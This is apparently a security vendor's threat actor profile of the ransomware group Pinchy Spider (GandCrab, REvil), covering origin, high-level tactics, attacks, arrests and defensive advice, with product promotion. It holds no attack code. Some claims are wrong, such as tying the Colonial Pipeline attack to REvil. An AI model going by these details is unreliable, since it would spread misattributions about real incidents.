Threat Actor Profile

Pinchy Spider

Pinchy Spider, also known as Gold Southfield, is a financially motivated cybercriminal group originating from Russia. Active since 2018, they are infamous for developing and operating GandCrab and REvil ransomware under a Ransomware-as-a-Service (RaaS) model. Their operations focus on high-value targets using advanced tactics like lateral movement and data exfiltration.

Threat Actor Profile

Pinchy Spider

Country of Origin

Pinchy Spider is believed to operate out of Russia. This assumption is supported by their avoidance of targeting systems in Russia and other Commonwealth of Independent States (CIS) countries.

Members

The exact size of the group is unknown. Pinchy Spider operates through a network of affiliates who execute ransomware attacks using their RaaS platform.

Leadership

The leadership of Pinchy Spider remains unknown. However, their operations suggest a highly organized structure with clear roles for developers and affiliates.

Pinchy Spider TTPs

Tactics

The primary goal of Pinchy Spider is financial gain through ransomware attacks targeting enterprises and critical infrastructure.

Techniques

Exploiting vulnerabilities in public-facing applications (e.g., Oracle WebLogic).
Using stolen credentials for lateral movement via RDP.
Employing phishing campaigns to gain initial access.

Procedures

Deploying GandCrab and REvil ransomware.
Utilizing tools like Cobalt Strike and certutil for reconnaissance and persistence.
Encrypting individual hosts and demanding per-host ransoms.

Want to Shut Down Threats Before They Start?

Schedule a Demo Today

Notable Cyberattacks

Pinchy Spider has been linked to several significant cyberattacks:

GandCrab Campaigns (2018-2019): These campaigns targeted enterprises worldwide and generated over $2 billion in ransom payments. The group’s innovative RaaS model allowed affiliates to execute attacks on a large scale.
REvil Operations (2019-2021): Pinchy Spider transitioned to using REvil ransomware, which became one of the most prevalent ransomware tools. High-profile incidents included attacks on managed service providers and critical infrastructure, such as the Colonial Pipeline incident.

Law Enforcement & Arrests

Law enforcement agencies have made significant progress in combating Pinchy Spider and its affiliates:

In 2020, a GandCrab operator was arrested in Belarus, marking a major breakthrough in disrupting the group’s operations.

In 2021, several REvil affiliates were arrested in Romania and Kuwait, further weakening the group’s network.

In 2024, Russian authorities sentenced members of the REvil ransomware group to over four years in prison, demonstrating international efforts to hold cybercriminals accountable.

How to Defend Against Pinchy Spider

Deploy advanced endpoint protection solutions and anti-phishing technologies to detect and block malicious activities.

Regularly patch vulnerabilities in software and systems to prevent exploitation by attackers.

Segment networks to limit the lateral movement of attackers within the environment.

Use Huntress Platform Tools to detect and mitigate ransomware threats effectively, ensuring robust protection against Pinchy Spider’s tactics.

Try Huntress for Free

References

https://apt.etda.or.th/cgi-bin/showcard.cgi?g=Pinchy%20Spider%2C%20Gold%20Southfield

https://attack.mitre.org/groups/G0115/#:~:text=GOLD%20SOUTHFIELD%20is%20a%20financially,to%20perpetrate%20high%20value%20deployments.

Detect, Respond, Protect

See how the global Huntress SOC can augment your team
with 24/7 coverage and unmatched human expertise.
Start your free trial today.

Try Huntress for Free